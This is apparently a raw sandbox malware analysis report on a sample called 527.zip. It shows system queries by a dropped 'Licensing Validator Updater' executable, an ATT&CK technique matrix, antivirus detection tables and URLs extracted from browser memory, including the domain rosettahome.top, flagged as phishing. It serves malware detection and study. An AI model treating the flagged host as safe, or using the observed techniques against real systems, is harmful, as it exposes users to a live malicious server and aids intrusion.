Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 21 PowerShell | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 12 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Extra Window Memory Injection | 1 Rundll32 | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Extra Window Memory Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
[Behavior graph: Behavior Graph ID: 1591248; Sample: 527.zip; Startdate: 14/01/2025; Architecture: WINDOWS; Score: 80]

No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe (copy) | 5% | ReversingLabs | |
C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exe | 5% | ReversingLabs | |
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://identity.mozilla.com/apps/oldsync | 0% | Avira URL Cloud | safe |
https://identity.mozilla.com/cmd/resource://gre/modules/FileUtils.sys.mjsidentity.fxaccounts.remote. | 0% | Avira URL Cloud | safe |
https://identity.mozilla.com/ids/ecosystem_telemetrynot | 0% | Avira URL Cloud | safe |
http://rosettahome.top/rosettahome_cgi/cgi | 100% | Avira URL Cloud | phishing |
http://www.urwpp.de | 0% | Avira URL Cloud | safe |
Name | Malicious | Antivirus Detection | Reputation
http://rosettahome.top/rosettahome_cgi/cgi | false | Avira URL Cloud: phishing | unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high
                                                                                                                                            high
                                                                                                                                            https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=htfirefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-reportfirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://exslt.org/commonfirefox.exe, 00000003.00000003.1666117463.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1439458960.000001CA7F193000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1694765742.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1621499602.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullScfirefox.exe, 00000003.00000003.1532015226.000001CA1B442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/idfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestionsfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://mozilla.org/#/properties/branches/anyOf/0/items/properties/featurefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://MD8.mozilla.org/1/mfirefox.exe, 00000003.00000003.1674522956.000001CA0EEC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://mozilla.org/#/properties/enabledfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabledfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://addons.mozilla.org/firefox/addon/to-google-translate/firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152firefox.exe, 00000003.00000003.1579874813.000001CA1964B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://bugzilla.mofirefox.exe, 00000003.00000003.1528006163.000001CA1B1EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://mitmdetection.services.mozilla.com/firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 00000003.00000003.2105394117.000001CA0CE71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1802512268.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://shavar.services.mozilla.com/firefox.exe, 00000003.00000003.1535183184.000001CA1B057000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://identity.mozilla.com/ids/ecosystem_telemetrynotfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://spocs.getpocket.com/firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-ffirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://mozilla.org/#/properties/endDatefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://mozilla.org/#/properties/addonsFeatureGatefirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://monitor.firefox.com/user/breach-stats?includeResolved=truefirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-reportfirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://mozilla.org/#/properties/addonsShowLessFrequentlyCapfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
